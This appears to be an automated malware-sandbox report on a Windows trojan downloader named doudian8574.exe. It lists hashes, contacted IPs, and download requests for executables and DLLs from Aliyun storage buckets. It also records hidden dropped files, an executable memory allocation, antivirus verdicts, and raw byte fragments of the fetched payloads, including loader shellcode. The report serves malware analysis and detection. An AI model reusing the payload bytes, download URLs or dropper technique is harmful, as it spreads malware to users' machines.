Summary | ZeroBOX

doudian8574.exe

Malicious Library UPX PE64 PE File DLL OS Processor Check CHM Format
Category Machine Started Completed
FILE s1_win7_x6403_us Aug. 12, 2023, 7:09 p.m. Aug. 12, 2023, 7:12 p.m.
Size 52.5KB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 11746e92a679b202ffc31a9397db030f
SHA256 a511fac843b237992e58bde1e41ec271891e96c9e32279687c058baea9f005a2
CRC32 72408A7D
ssdeep 768:V4f9SsBo7cTlFWT8llD4zAA8lU6ez5cIgQMzKHMcTzH5iakD0XdLIsybqvZY:2foF7cvWTEPUP5/gQoqZTliIoeZ
Yara
  • IsPE64 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature

IP Address Status Action
117.18.232.200 Active Moloch
121.199.204.174 Active Moloch
121.199.204.179 Active Moloch
164.124.101.2 Active Moloch
47.110.23.90 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET https://yts2023811.oss-cn-hangzhou.aliyuncs.com/3.bin
request GET https://2023816.oss-cn-hangzhou.aliyuncs.com/hrsgdsb8574wknzms.jpg
request GET https://2023815.oss-cn-hangzhou.aliyuncs.com/UnityPlayer.dll
request GET https://2023815.oss-cn-hangzhou.aliyuncs.com/ttd.exe
request GET https://2023816.oss-cn-hangzhou.aliyuncs.com/qd.CHM
request GET https://2023816.oss-cn-hangzhou.aliyuncs.com/md.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2084
region_size: 421888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000026d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\Users\Public\Documents\Microsoft\UnityPlayer.dll
file C:\Users\Public\Documents\Microsoft\windows.exe
file C:\Users\Public\Documents\ttd.exe
file C:\Users\Public\Documents\UnityPlayer.dll
file C:\Users\Public\zdmxd.exe
Time & API Arguments Status Return Repeated

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\Public\Documents\
filepath: C:\Users\Public\Documents\
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: èYI‰ÈHÁ# º²‹÷IÀ#cA¹VH‰æHƒäðHƒì0ÇD$ èH‰ô^ÃH‹ÄH‰XD‰H L‰@‰PUVWATAUAVAWHl$HìpE3ÿÇEØkeH‹ñL‰}ø¹œ¿½L‰}ÈL‰}EOeL‰}DˆM¼DˆM¢L‰}L‰}ðL‰}D‰}$D‰|$,ÇEÜrnÇEàelÇEä32ÇEè.dÇEìllÇD$@SleeÆD$DpÇD$XLoadÇD$\LibrÇD$`aryAÇD$HVirtÇD$LualAÇD$PllocÇD$hVirtÇD$lualPÇD$protefÇD$tctÇE¨FlusÇE¬hInsÇE°trucÇE´tionÇE¸CachÇD$xGetNÇD$|ativÇE€eSysÇE„temIfÇEˆnfÆEŠoÇERtlAÇE”ddFuÇE˜nctiÇEœonTafÇE blè¹µAÙ^H‹ØèrL‹èH‰EÐHEØÇE LL$8H‰E(LE 3Ò3ÉÿÓH‹L$8HD$HE3ÀH‰D$0LMÈÇD$( HT$(AÿÕH‹L$8HD$hE3ÀH‰D$0LMÇD$(HT$(AÿÕHE¨ÇD$(H‹L$8LME3ÀH‰D$0HT$(AÿÕH‹L$8HD$xE3ÀH‰D$0LMÇD$(HT$(AÿÕH‹L$8HD$@E3ÀH‰D$0LMðÇD$(HT$(AÿÕH‹L$8HEE3ÀH‰D$0LMÇD$(HT$(AÿÕH‹L$8HD$XE3ÀH‰D$0LMøÇD$( HT$(AÿÕL9}È„L9}„L9}ð„ L9}„ÿH‹UH…Ò„òHc~<Hþ?PE…߸d†f9G…ÐEOD„O8…·OA‹ßHƒÁ$fD;s%D·GHÏD9y‹G8EAHI(;ÃFËØM+ÁuãHM8ÿҋU<D‹ÂDrÿ÷ÚDwPIHÿ‹ÂL#ð‹ÃHÈI@ÿH÷ÐH#ÈL;ñ…TH‹O0A¼0E‹ÄA¹I‹ÖÿUÈH‹ØH…ÀuDHE‹ÄI‹Ö3ÉÿUÈH‹ØD‹¥ÐA»E„ãt‹F<‰C<‹V<ë ‹ÊAӊ1ˆ;WTrðëA‹×D9Tv‹ÊAӊ1ˆ;WTrðHc{<E‹×HûH‰}0D·GIƒÀ(fD;s:LÇE‹ÏE98vA‹PA‹HüA‹ÁEËHÈHЊ2ˆE;rá·GEÓIƒÀ(D;ÐrÉL‹óA¸L+w0„ÖD9¿´„ÉD‹°LËE99„¶MQé‘E·A·ËA·ÃfÁé fƒù u)E‹AãÿKH‹KA»IÖH‰ECëOA»fƒùu%ÿH A‹Æë.fA;Ëu%ÿH I‹ÆHÁè·ÀëfA;Èu%ÿH A·ÆA‹H MÐA‹AIÁL;Ð…_ÿÿÿM‹ÊE9:…JÿÿÿD9¿”„‚‹E‹ïLI@ ëEëH@D98uôA‹Äƒà‰EÀ‹Á„‰E;놀AÁìE]ÿE‹×E…ÛttM‹ÈA¾ÿA3ÒA‹ÍA+ÊiöýCA‹Æ÷ñ3ҁÆÞ&H‹ÆÁèA#Æ÷ñAÂAÿÂH €A‹TˆA ˆAˆA‹AA‰DˆA A‰QMIE;Ór¡‹‡ëD‹eÀ‹ðHó‹F …À„±‹}À‹ÈHËÿUøH‰D$8L‹ÐD‹6D‹~LóLûI‹H…Ét_H…ÉyE·3Òë2HS3ÀHÑ8tH‹ÊHÿÁHÿÀ€9uõH‰T$0E3ÀHT$(f‰D$(f‰D$*M‹ÏI‹ÊÿUÐIƒÆIƒÇI‹H…ÉtL‹T$8ë¡E3ÿ…ÿtAƒýv AiÌèÿUð‹F HƒÆ…À…VÿÿÿH‹}0L‹mÐD9¿ô„©D‹¿ðIƒÇLûE3äA‹…À„Š‹ÈHËÿUøH‰D$8H‹ÈA‹wE‹w HóLóL9&t^I‹H…ÒyD·Â3Òë4LCI‹ÄLÂE8 tI‹ÐHÿÂHÿÀD8"uõL‰D$0HT$(E3Àf‰D$(f‰D$*L‹ÎAÿÕHƒÆIƒÆL9&tH‹L$8ë¢IƒÇ ékÿÿÿE3ÿ·wE‹÷HƒÆ(A¼fD;ƒ H÷D9>„ë‹F‹Èá uºàr…Àx E‹ÄD‰d$ 餅Éu<ºàr …ÀyDAëh…Éu(ºàs …ÀxDAëT…Éuºàs …ÀyDAë@…Ét_ºàr …ÀxA¸ë*…ÉtIºàr …ÀyA¸€ë…Ét3ºàs…Àx A¸ D‰D$ ë!…ÉtºàsD‹D$ …À¹@DHÁëÝD‹D$ ÷Ft Aºè D‰D$ ‹NüLL$ ‹HËÿU·GEôHƒÆ(D;ð‚øþÿÿE3À3ÒHƒÉÿÿUD9¿Ôt$‹‡ÐH‹tëE3ÀA‹ÔH‹ËÿÐHvH‹H…ÀuéL‹MM…Ét/‹‡¤…Àt%‹ÈL‹ÃH¸«ªªªªªªªH÷ዏ HÁêHËA+ÔAÿыG(M‹ÄHÃA‹ÔH‹ËÿЋµ¸…ö„—D9¿Œ„Š‹ˆHËD‹YE…ÛtxD9ytrD‹I A‹ÿ‹Q$LËHÓE…Ût]E‹E‹×LÃtRë ¾ÀDÐAÁÊ MÄAŠ„ÀuìA;òuH…ÒuAüIƒÁHƒÂA;ûs"ëËA· H˕ÈD‹ˆH‹ÀLÃAÿÐH‹Ãë3ÀH‹œ$°HÄpA_A^A]A\_^]ÃÌH‹ÄH‰XH‰hH‰pH‰x AVHƒìeH‹%`‹éE3öH‹PL‹JM‹A0M…À„³AAXIc@<A‹ÖM‹ ó$F‹œˆE…ÛtÒH‹$HÁèfD;ðs"H‹L$D·Ð¾ÁÊ €9a|ƒÂàÐHÿÁIƒêuçOE‹ÞA‹z IøE9rvŽ‹7A‹ÞIðH¾HÿÆÁË لÉuñ;ÅtAÿÃE;ZrÕé^ÿÿÿA‹B$C IÀ·A‹JIȋ‘IÀë3ÀH‹\$ H‹l$(H‹t$0H‹|$8HƒÄA^ÃMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ÿ IÛk'ÒÛk'ÒÛk'ÒÏ$ÓÑk'ÒÏ#ÓÏk'ÒÏ"Ótk'҉#ÓÔk'҉$ÓÑk'҉"ӗk'ÒÏ&ÓÖk'ÒÛk&ÒEk'Ò.ÓÙk'Ò'ÓÚk'Ò%ÓÚk'ÒRichÛk'ÒPEd†\áÖdð" ²À””€À`PŸH˜ŸŒPT9 °@ 8€ 8И.textè±² `.rdataìÛÐܶ@@.data€’°v’@À.pdataT9P:@@_RDATAôB@@.reloc° D@BHƒì(H Õè$TH °HƒÄ(éˆH ]°éˆH õ¯éˆHƒì(A¹H×E3ÀH ]èœbH e°HƒÄ(éԇ@SHƒì ¹èÄH ¡H‹ØèñbHòÔE3ÀH‹ÓH‰…H ~ègH j°HƒÄ [鄇H‹ñHêH‰CHcHH‹0
request_handle: 0x0000000000cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $(Ånl¤p=l¤p=l¤p=xÏt<g¤p=xÏs<i¤p=xÏu<é¤p=>Ñt<b¤p=>Ñs<e¤p=>Ñu<N¤p=xÏq<i¤p=l¤q=4¤p=«Ñy<n¤p=«Ñp<m¤p=«Ñr<m¤p=Richl¤p=PEd†çÖÖdð" äÔP€`àL,<Àª˜ ðpðw80x8P.textÜãä `.rdata˜šè@@.data  ‚@À.pdataÀŽ@@_RDATAüà @@.relocpð¢@B
request_handle: 0x0000000000cc0018
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ö£ty²Â*²Â*²Â*ݦ+¸Â*ݦ+·Â*ݦ+?Â*ݦ+°Â*àª+”Â*àª+¢Â*àª+ºÂ*6«+±Â*²Â*àÂ*6«+°Â*6«+³Â*6«å*³Â*6«+³Â*Rich²Â*PEd†ˆÂÓ]ð" ž^ `@0 §+ `1ˆ˜1<pà ` î ˜ p"TÐ"° .textpž `.rdataވ°Š¢@@.dataÈ@ ,@À.pdata `6@@.rsrcà p¢D@@.reloc æ @B
request_handle: 0x0000000000cc0018
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $(Ånl¤p=l¤p=l¤p=xÏt<g¤p=xÏs<i¤p=xÏu<é¤p=>Ñt<b¤p=>Ñs<e¤p=>Ñu<N¤p=xÏq<i¤p=l¤q=4¤p=«Ñy<n¤p=«Ñp<m¤p=«Ñr<m¤p=Richl¤p=PEd†çÖÖdð" äÔP€`àL,<Àª˜ ðpðw80x8P.textÜãä `.rdata˜šè@@.data  ‚@À.pdataÀŽ@@_RDATAüà @@.relocpð¢@B
request_handle: 0x0000000000cc0018
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ö£ty²Â*²Â*²Â*ݦ+¸Â*ݦ+·Â*ݦ+?Â*ݦ+°Â*àª+”Â*àª+¢Â*àª+ºÂ*6«+±Â*²Â*àÂ*6«+°Â*6«+³Â*6«å*³Â*6«+³Â*Rich²Â*PEd†ˆÂÓ]ð" ž^ `@0 §+ `1ˆ˜1<pà ` î ˜ p"TÐ"° .textpž `.rdataވ°Š¢@@.dataÈ@ ,@À.pdata `6@@.rsrcà p¢D@@.reloc æ @B
request_handle: 0x0000000000cc0018
1 1 0

InternetReadFile

buffer: MZÿÿ¸@ິ Í!¸LÍ!This program cannot be run in DOS mode. $-ƒ:CiâTiâTiâT”þWâT”ÊcâT”ÿIâT`šÇnâTiâU!âT”ûhâT”ÉhâTRichiâTPEd†¥SÓdð"  `à@Lð@`@ôT Pô(UPX0à€àUPX1`ð`@à.rsrcPd@À3.96UPX! $e+°Ói':\ÞIj
request_handle: 0x0000000000cc0018
1 1 0
host 117.18.232.200
registry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
process doudian8574.exe useragent Downloader
process doudian8574.exe useragent RookIE/1.0
process doudian8574.exe useragent FileDownload
Lionic Trojan.Win32.Agent.Y!c
Elastic malicious (high confidence)
Malwarebytes Generic.Malware/Suspicious
Sangfor Downloader.Win32.Agent.Vy0i
Cybereason malicious.630909
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win64/TrojanDownloader.Agent_AGen.DC
APEX Malicious
Kaspersky Trojan-Downloader.Win32.Agent.xyaytd
Avast FileRepMalware [Misc]
Tencent Win64.Trojan-Downloader.Oader.Hflw
Sophos Mal/Generic-S
McAfee-GW-Edition BehavesLike.Win64.NetLoader.qm
SentinelOne Static AI - Suspicious PE
Antiy-AVL GrayWare/Win32.Wacapew
Microsoft Trojan:Win32/Casdet!rfn
ZoneAlarm Trojan-Downloader.Win32.Agent.xyaytd
McAfee RDN/Generic Downloader.x
Cylance unsafe
Panda Trj/Chgt.AD
TrendMicro-HouseCall TROJ_GEN.R002H0DHB23
Rising Downloader.Agent!8.B23 (TFE:5:VthFwSSuMeK)
Ikarus Win32.Outbreak
MaxSecure Trojan.Malware.300983.susgen
Fortinet W64/Agent_AGen.DC!tr.dldr
AVG FileRepMalware [Misc]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)